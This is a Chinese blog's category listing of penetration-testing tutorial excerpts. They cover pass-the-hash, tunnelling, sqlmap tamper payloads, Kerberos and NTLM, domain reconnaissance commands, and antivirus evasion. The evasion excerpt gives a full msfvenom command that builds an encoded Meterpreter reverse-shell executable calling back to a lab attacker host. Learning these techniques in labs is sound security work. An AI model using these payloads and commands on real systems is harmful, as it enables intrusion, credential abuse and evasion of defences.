内网渗透
文章平均质量分 61
技术仅供参考
嘎嘎不是鸭
我很懒,还没有添加简介
展开
-
哈希传递常用方法
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。原创 2023-05-13 09:50:48 · 487 阅读 · 0 评论 -
内网端口转发
在渗透过程中拿到主机权限后,下一步通常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行通信。...原创 2022-08-10 02:04:53 · 978 阅读 · 0 评论 -
tamper脚本&mysql爆破脚本编写
tamper概念: sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等。基本操作: 查看脚本:python sqlmap.py --list-tampers 使用脚本:python sqlmap.py --tamper=script_name...原创 2022-03-14 00:06:50 · 968 阅读 · 0 评论 -
sqlmap中tamper的用法
sqlmap部分脚本用法说明1、apostrophemask.py适用数据库:ALL作用:将引号替换为utf-8,用于过滤单引号使用脚本前:tamper("1 AND '1'='1")使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%8712、base64encode.py适用数据库:ALL作用:替换base64编码使用脚本前:tamper("1' AND SLEEP(5)#")使用脚本后:MScgQU5EIFNMRUVQKDUpIw==原创 2022-03-09 17:11:52 · 10582 阅读 · 0 评论 -
kerberos认证协议
kerberos是一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下,kerberos作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。kerberos和NTLM的区别:在kerberos之前,Microsoft使用一种称为NTLM...原创 2022-03-07 23:42:21 · 1550 阅读 · 0 评论 -
NTLM认证
NTLM(NT LAN MANAGER)是一种网络认证协议,它是基于挑战(Challenge)/响应(Response)认证机制的一种认证模式。NTLM使用在Windows NT和Windows 2000 Server(or later)工作组环境中(kerberos用在域模式下)。在AD域环境中,如果需要认证Windows NT系统,也必须采用NTLM。NTLM协议的认证过程分为三步:1、协商:主要用于确认双方协议版本(NTLM v1/NTLM v2)2、质询:就是挑战/响应认证机制起作用原创 2022-03-06 23:09:14 · 10684 阅读 · 1 评论 -
Windows本地认证
在本地登陆Windows的情况下,操作系统会使用用户输入的密码作为凭证去与系统中的密码进行验证,操作系统中的密码存储文件是什么?位置在哪里?%SystemRoot%\system32\config\samWindows本地认证流程:winlogon.exe ==> 接收用户输入 ==> lsass.exe ==> 认证首先,用户注销、重启、锁屏后,操作系统会让winlogon.exe显示登陆界面,也就是输入框界面,接收用户的输入信息后,将密码交给lsass进程,这.原创 2022-03-06 16:07:52 · 4687 阅读 · 0 评论 -
域内信息收集
以下列举常用信息收集,包括但不限于此。查询域:net view /domain查询域内所有计算机:net view /domain:domain_name查询域内所有用户组列表:net group /domain查询域控:net group "domain controllers" /domain查询域当前时间:net time /domain查询域用户列表:net...原创 2022-03-06 15:38:21 · 498 阅读 · 0 评论 -
常见的几种免杀方法
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.181、自编码免杀msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用微步沙箱检测结果,检出率近一半,效果一般...原创 2022-03-05 22:25:16 · 6370 阅读 · 1 评论